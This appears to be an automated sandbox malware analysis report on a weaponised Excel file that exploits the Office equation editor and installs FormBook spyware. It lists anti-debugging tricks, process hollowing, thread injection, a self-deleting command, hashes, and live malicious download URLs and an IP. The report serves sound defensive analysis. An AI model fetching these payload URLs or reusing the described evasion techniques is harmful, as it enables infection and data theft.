      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B rdtsc
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376Thread sleep time: -360000s >= -30000s
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376Thread sleep time: -60000s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 3008Thread sleep time: -420000s >= -30000s
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376Thread sleep time: -360000s >= -30000s
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376Thread sleep time: -60000s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 3008Thread sleep time: -420000s >= -30000s
      Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000007.00000000.2337992936.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
      Source: explorer.exe, 00000007.00000000.2337947660.00000000041DB000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: vbc.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000007.00000000.2332515395.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
      Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000007.00000000.2337992936.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
      Source: explorer.exe, 00000007.00000000.2337947660.00000000041DB000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: vbc.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000007.00000000.2332515395.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000
      Hides threads from debuggersShow sources
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPort
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPort
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B rdtsc
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B rdtsc
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312F56 LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312F56 LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003154F4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00311C16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00314802 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00314CBB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315531 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003129C8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00311E09 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00311721 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003154F4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00311C16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00314802 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00314CBB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315531 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003129C8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00311E09 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00311721 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9A26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B4802 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B29C2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5435 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5449 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5472 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B548D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B4CBB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B54B9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5531 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020C26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: Debug
      Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
      Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 960000
      Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 960000
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsCommand and Scripting Interpreter1Path InterceptionProcess Injection412Masquerading111OS Credential DumpingSecurity Software Discovery631Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion23LSASS MemoryVirtualization/Sandbox Evasion23Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Process Injection412Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information31LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery22VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 320235 Sample: Unique food order.xlsx Startdate: 19/11/2020 Architecture: WINDOWS Score: 100 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 54 14 other signatures 2->54 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 16 2->15         started        process3 dnsIp4 38 wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu 103.125.191.5, 49165, 49166, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->38 32 C:\Users\user\AppData\...\svchost[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 66 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->66 17 vbc.exe 10->17         started        36 C:\Users\user\...\~$Unique food order.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 40 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 17->40 42 Tries to detect Any.run 17->42 44 Tries to detect virtualization through RDTSC time measurements 17->44 46 2 other signatures 17->46 20 vbc.exe 9 17->20         started        process9 signatures10 56 Modifies the context of a thread in another process (thread injection) 20->56 58 Tries to detect Any.run 20->58 60 Maps a DLL or memory area into another process 20->60 62 3 other signatures 20->62 23 explorer.exe 20->23 injected process11 process12 25 NAPSTAT.EXE 23->25         started        28 autoconv.exe 23->28         started        signatures13 64 Tries to detect virtualization through RDTSC time measurements 25->64 30 cmd.exe 25->30         started        process14

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Unique food order.xlsx25%VirustotalBrowse
      Unique food order.xlsx23%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://103.125.191.5/bin_xMjelaYnr43.binq~f0%Avira URL Cloudsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://103.125.191.5/bin_xMjelaYnr43.binY~f0%Avira URL Cloudsafe
      http://www.%s.com0%URL Reputationsafe
      http://www.%s.com0%URL Reputationsafe
      http://www.%s.com0%URL Reputationsafe
      http://www.%s.com0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://%s.com0%URL Reputationsafe
      http://%s.com0%URL Reputationsafe
      http://%s.com0%URL Reputationsafe
      http://%s.com0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe1%VirustotalBrowse
      http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe100%Avira URL Cloudmalware
      http://treyresearch.net0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://103.125.191.5/bin_xMjelaYnr43.bin0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
      		103.125.191.5
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exetrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: malware
        		unknown
        http://103.125.191.5/bin_xMjelaYnr43.bintrue
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpfalse
          		high
          http://103.125.191.5/bin_xMjelaYnr43.binq~fvbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.icra.org/vocabulary/.vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmpfalse
            		high
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.2332531261.0000000000260000.00000004.00000020.sdmpfalse
              		high
              http://103.125.191.5/bin_xMjelaYnr43.binY~fvbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.%s.comexplorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		low
              http://www.piriform.com/ccleanerexplorer.exe, 00000007.00000000.2337234886.00000000039F4000.00000004.00000001.sdmpfalse
                		high
                http://www.%s.comPAvbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		low
                http://%s.comexplorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		low
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://treyresearch.netexplorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpfalse
                  		high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  103.125.191.5
                  		unknownViet Nam
                  		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

                  General Information

                  Joe Sandbox Version:31.0.0 Red Diamond
                  Analysis ID:320235
                  Start date:19.11.2020
                  Start time:07:41:52
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 9m 38s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Unique food order.xlsx
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:11
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.expl.evad.winXLSX@10/3@1/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 16.3% (good quality ratio 13%)
                  • Quality average: 54.5%
                  • Quality standard deviation: 34.3%
                  HCA Information:
                  • Successful, ratio: 72%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                  • TCP Packets have been reduced to 100
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  07:43:12API Interceptor68x Sleep call for process: EQNEDT32.EXE modified
                  07:44:20API Interceptor202x Sleep call for process: vbc.exe modified
                  07:44:49API Interceptor72x Sleep call for process: NAPSTAT.EXE modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtt payment proof.xlsxGet hashmaliciousBrowse
                  • 103.125.191.187
                  TIE-3735-2020.xlsxGet hashmaliciousBrowse
                  • 103.125.191.229
                  payslip.s.xlsxGet hashmaliciousBrowse
                  • 103.125.191.187
                  Telex-relase.xlsxGet hashmaliciousBrowse
                  • 103.141.138.120
                  Y0L60XAhvo.rtfGet hashmaliciousBrowse
                  • 103.141.138.122
                  d6pj421rXA.exeGet hashmaliciousBrowse
                  • 103.139.45.59
                  8YPssSkVtu.rtfGet hashmaliciousBrowse
                  • 103.141.138.87
                  PI098763556299.xlsxGet hashmaliciousBrowse
                  • 103.125.191.229
                  PIT12425009.xlsxGet hashmaliciousBrowse
                  • 103.125.191.229
                  wIeFid8p7Q.exeGet hashmaliciousBrowse
                  • 103.125.189.164
                  Dell ordine-09362-9-11-2020.exeGet hashmaliciousBrowse
                  • 103.139.45.59
                  shipping documents.xlsxGet hashmaliciousBrowse
                  • 103.133.108.6
                  shipping documents.xlsxGet hashmaliciousBrowse
                  • 103.133.108.6
                  EES RFQ 60-19__pdf.exeGet hashmaliciousBrowse
                  • 103.114.107.156
                  Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                  • 103.141.138.122
                  Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                  • 103.141.138.122
                  Z08LsyTAN6.exeGet hashmaliciousBrowse
                  • 103.125.189.164
                  QUO_M.VECOQUEEN.xlsx.docxGet hashmaliciousBrowse
                  • 103.125.191.123
                  R56D5hnFR3.rtfGet hashmaliciousBrowse
                  • 103.125.191.123
                  http://103.125.191.123/winlog/document.docGet hashmaliciousBrowse
                  • 103.125.191.123

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:downloaded
                  Size (bytes):61440
                  Entropy (8bit):4.914988096771549
                  Encrypted:false
                  SSDEEP:768:t4cVBi/uynLCBod2XkqAy6dH4ErjAxvWhT5z78gdseDd4kyKz:tO/uB953eg9ylzogB+kl
                  MD5:C05EEE88F0B57E853996957D6523397B
                  SHA1:FC16FA4AB9A88F7E2405EB9A77D168D9C1B7C8D3
                  SHA-256:7E70E44956CDB045FD7B5C66ECA50996900059FD8851AA76BE19A5DD492C6918
                  SHA-512:9441441F5D6D84E4C674E77013CE1BF562173195DE9AC1C05463BCF0BBDA51345B6AF219B279F93E7D2DF84BBFB22D11906B8A145F1FE98EFAF3A28786BE220F
                  Malicious:true
                  Reputation:low
                  IE Cache URL:http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L......P.....................0....................@............................................................................<...........................................................................0...0....................................text...`........................... ..`.data...............................@....rsrc...............................@..@.[#X.......I#...........USER32.DLL.MSVBVM60.DLL.........................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\Desktop\~$Unique food order.xlsx
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):330
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                  Malicious:true
                  Reputation:moderate, very likely benign file
                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  C:\Users\Public\vbc.exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
